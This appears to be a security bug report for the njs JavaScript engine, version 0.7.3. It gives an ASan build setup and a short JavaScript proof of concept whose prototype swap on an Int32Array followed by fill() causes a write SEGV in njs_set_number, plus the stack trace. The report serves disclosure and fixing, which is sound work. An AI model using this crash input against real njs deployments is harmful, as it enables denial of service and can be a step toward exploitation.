SEGV src/njs_value.h in njs_set_number

[xmzyshypnc]

Environment

OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

PoC

function main() {
var arr_32 = new Int32Array(1);
var arr_1 = [1];
arr_32.__proto__ = arr_1;

var arr_fill = arr_32.fill();

var func = `
    async function test() { 
    }
`;
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL

==781315==ERROR: AddressSanitizer: SEGV on unknown address 0x555e3b24caa8 (pc 0x555e3b1e5058 bp 0x7fffe5a62250 sp 0x7fffe5a62180 T0)
==781315==The signal is caused by a WRITE memory access.
#0 0x555e3b1e5057 in njs_set_number src/njs_value.h
#1 0x555e3b1e5057 in njs_typed_array_set_value src/njs_typed_array.c:705
#2 0x555e3b0d7ba6 in njs_value_property_set src/njs_value.c
#3 0x555e3b1235af in njs_value_property_i64_set src/njs_value.h:1098
#4 0x555e3b1235af in njs_array_prototype_fill src/njs_array.c:1885
#5 0x555e3b13d61c in njs_function_native_call src/njs_function.c:739
#6 0x555e3b0e30fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#7 0x555e3b13caba in njs_function_lambda_call src/njs_function.c:703
#8 0x555e3b0e30fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#9 0x555e3b0dd0ba in njs_vm_start src/njs_vm.c:553
#10 0x555e3b0c63f8 in njs_process_script src/njs_shell.c:890
#11 0x555e3b0c6ebf in njs_process_file src/njs_shell.c:619
#12 0x555e3b0c821f in main src/njs_shell.c:303
#13 0x7f339244b082 in __libc_start_main ../csu/libc-start.c:308
#14 0x555e3b0c3c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_value.h in njs_set_number
==781315==ABORTING

Credit

xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)

[Cook1eBB]

• ****